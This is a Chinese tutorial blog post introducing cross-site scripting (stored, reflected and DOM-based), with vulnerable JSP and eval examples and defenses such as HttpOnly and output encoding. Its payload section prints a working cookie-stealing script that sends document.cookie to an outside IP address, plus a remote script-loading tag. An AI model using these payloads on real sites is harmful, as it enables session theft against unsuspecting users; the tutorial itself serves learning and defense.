XSS入门

  • XSS(cross site script跨域脚本)

官方解释
通常指黑客通过html注入,篡改网页,插入恶意脚本,从而在用户浏览网页时,控制浏览器的一种手段

个人理解
xss是指黑客通过构建url的参数或者通过输入框等向服务器输入恶意js脚本,然后再通过服务器输出含有恶意脚本的网页,使浏览了这些网页的网民可能会被黑客控制,比如黑客可以获取他们的cookie及其其他重要信息,或者黑客可以不断弹出恶意弹出框,骚扰用户..xss的重点在于我们如何把输入(恶意脚本)通过网页的漏洞,然后嵌套到网页中,使原本没有这段恶意脚本的网页有这段脚本.

  • 类型

持久性
是指黑客的恶意脚本已经被存储到服务器里,只要有用户浏览相关网页,就会中招.比如黑客把某段攫取用户cookie的恶意脚本写到某个帖子里面(比如 如何通过五年时间赚取人生的第一套房 ),刚好那个bbs网站又没有做xss处理,那么浏览这个网页的用户以为自己只是在看某个很普通的帖子,实际上他在这个网站的cookie已经被发到黑客自己的服务器上.然后黑客就可以通过这个用户cookie,登录这个bbs网站,然后进行一些非法操作.wordpress根本没做什么xss防御,很容易就被植入持久性xss.

反射型
是指黑客的恶意脚本没有存储到服务器上,一般黑客是把一个含有恶意脚本的url发给用户,诱导用户去点击,然后再攫取你的信息.比如,
服务器的JSP:

<body>
    <%=request.getParameter(“name”)%>
</body>

黑客给你的url:

http://localhost/test/test.jsp?name=<script>alert(1)</script>

这时会弹出


弹出框

这只是普通的弹出一个框,但是如果黑客在脚本里面写了攫取你的cookie的代码,那么你在localhsot这个网站的cookie就会被发送到黑客自己的服务器上面去..

你可能会觉得,谁会写像这个jsp这么弱智的代码,可是现实中确实是有不少输入参数打印到html的例子,比如搜索..

DOM型
不管是反射型xss还是持久化xss,他们都需要服务器把渲染好的含有恶意脚本的html返回给我们,然后我们才会中招,但是DOM型xss不需要经过服务器,比如
我们在script里面有这么一段代码

<script>
    eval(location.hash.substr(1));
</script>

PS:eval函数的作用是计算某个字符串,并执行里面的JavaScript代码.如果不是JavaScript代码会报错.

然后我们输入
http://localhost/test/test.jsp?name=huang#alert(1)
在这个例子中,xss的恶意代码#alert(1)没有经过服务器,但是由于JavaScript函数的漏洞,我们还是中招了.

  • xss payload

是什么?

黑客用于xss攻击的完成某些具体功能的恶意脚本就叫做xss payload.

盗取cookie的脚本

<script>
    var img = document.createElement(“img”);
    var cookie = document.cookie;
    img.src = “http://139.199.168.61?cookie=”+cookie;
    document.body.append(img);
</script>

只要把这段xss payload通过持久化xss插入到某个网页中,那么浏览这个网页的所有人在这个网站的cookie都会被发到139.199.168.61的服务器上.这里有两个问题:

  1. 如果输入框限制长度,这么长的脚本怎么办?我们可以把脚本写到某个文件中.比如
    <script src=”http://139.199.168.61/test.js”></script>

  2. 为什么要构造一张图片,而不直接用ajax请求?
    由于同源策略,ajax是比较难去请求不同源的网站的;而构造图片,网站都会加载,一加载就会中招.

  • 防御

  1. httpOnly
    服务器种cookie的时候,加上HTTPOnly关键字,用document.cookie获取cookie的时候,就获取不到这部分的cookie了.

  2. 对输入进行过滤
    前端 或者 后端 对 ”, <script>, eval, window, alert,javascript字段进行过滤然后再保存.比如我们想要保存 <script>alert(1)</script> ,过滤之后就只剩下保存alert(1)了

  3. 对输出进行编码 :
    在html中,你输入< 和输入 < 得到的都是 < 的视觉效果, 我们可以对诸如 < ,>等字符进行编码,使其视觉效果看起来一样,但是已经构不成原来的标签了,这样就失去了攻击力.java里面HtmlUtils.htmlEscape()就是通过这个原理对输出进行编码.

< 转成 &lt;
> 转成 &gt;
& 转成 &amp;
” 转成 &quot;
‘ 转成 &#39
\ 转成 \\
/ 转成 \/
; 转成 ;(全角;)
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,591评论 6 501
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,448评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,823评论 0 353
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,204评论 1 292
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,228评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,190评论 1 299
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,078评论 3 418
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,923评论 0 274
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,334评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,550评论 2 333
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,727评论 1 348
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,428评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,022评论 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,672评论 0 22
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,826评论 1 269
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,734评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,619评论 2 354

推荐阅读更多精彩内容

  • XSS攻击 XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS...
    BerL1n阅读 4,373评论 2 4
  • 跨站脚本(XSS)是web应用中的一种典型的计算机安全漏洞。XSS允许攻击者可以在其他用户浏览的web页面中注入客...
    留七七阅读 7,948评论 1 26
  • HTTP cookie(也称为web cookie,网络cookie,浏览器cookie或者简称cookie)是网...
    留七七阅读 17,950评论 2 71
  • 我们都在改变, 从简单到复杂, 从单纯到圆滑; 我们都想不变, 一直的善良着, 永远的耿直着。 生活似流水,...
    敷衍录阅读 160评论 0 0
  • 不知道你叫什么名字,不知道你是什么样子,然而因为你我学会了熬夜,也有了自卑的情绪,我想变得更好,我想当学霸,我想...
    高小书加油加油加油阅读 190评论 0 0